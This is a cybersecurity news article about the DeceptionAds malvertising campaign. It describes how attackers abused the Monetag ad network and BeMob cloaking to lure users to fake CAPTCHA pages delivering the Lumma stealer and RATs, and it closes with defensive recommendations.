DeceptionAds: The Malvertising Campaign Weaponizing Ad Networks

Cybersecurity researchers have uncovered an alarming malvertising campaign, dubbed DeceptionAds, that exploits legitimate ad networks to deliver information stealers and remote access trojans (RATs). With over 1 million daily ad impressions and thousands of victims, this campaign demonstrates how ad networks can be weaponized to compromise users’ accounts and financial assets.

The Core Mechanisms of DeceptionAds

At the heart of this campaign is the Monetag ad network, where threat actors register as website owners and funnel traffic through a Traffic Distribution System (TDS). Using clever cloaking techniques, the attackers redirect users to fake CAPTCHA verification pages that instruct them to execute Base64-encoded PowerShell commands, ultimately leading to the deployment of malware like Lumma.

According to Nati Tal, head of Guardio Labs:

Entirely reliant on a single ad network for propagation, this campaign showcases the core mechanisms of malvertising—delivering over 1 million daily 'ad impressions' and causing thousands of daily victims to lose their accounts and money.

A Fragmented Chain of Accountability

The attack exploits legitimate services in multiple ways:

• Monetag: Used to distribute traffic to malicious sites.
• BeMob: Cloaks the intent by routing traffic through benign URLs before redirecting to malicious CAPTCHA pages.
• Hosting Platforms: Malicious pages are hosted on services like Oracle Cloud, Scaleway, and Cloudflare's R2.

This multi-layered approach makes it difficult to pinpoint accountability, creating a fragmented chain of responsibility.

Beyond a Single Threat Actor

The campaign has expanded beyond a single threat actor, with reports of multiple unattributed clusters using similar techniques to deliver advanced malware, including:

• Remote Access Trojans (RATs)
• Post-exploitation frameworks like Brute Ratel C4

This underscores the growing adoption of social engineering tactics in the cybercriminal ecosystem.

Steps Taken and the Road Ahead

Following responsible disclosure, Monetag removed over 200 malicious accounts in late November 2024, and BeMob deactivated cloaking-related accounts. However, the campaign resumed by December 5, showing the resilience of these malicious networks.

Tal emphasized the need for robust content moderation and strict account validation processes, saying:

From deceptive publisher sites offering pirated or clickbait content to complex redirect chains and cloaking techniques, this campaign underscores how ad networks, designed for legitimate purposes, can be weaponized for malicious activities.

What Can Be Done?

To combat malvertising campaigns like DeceptionAds, the following measures are crucial:

1. Enhanced Content Moderation: Ad networks must improve systems to identify and block malicious registrations.
2. Stricter Validation: Implement multi-layered account verification to prevent fake accounts.
3. End-User Awareness: Educate users to avoid interacting with suspicious CAPTCHA verifications and unauthorized software prompts.
4. Collaboration: Ad networks, hosting providers, and cybersecurity firms need to work together to dismantle malicious campaigns.

Conclusion

The DeceptionAds campaign is a sobering reminder of how legitimate tools, like ad networks, can be weaponized in the wrong hands. By exploiting fragmented accountability and leveraging sophisticated cloaking techniques, cybercriminals continue to evolve their tactics.

As malvertising campaigns grow in scale and complexity, organizations and ad platforms must prioritize security to ensure their services remain tools for legitimate use rather than conduits for malicious activities.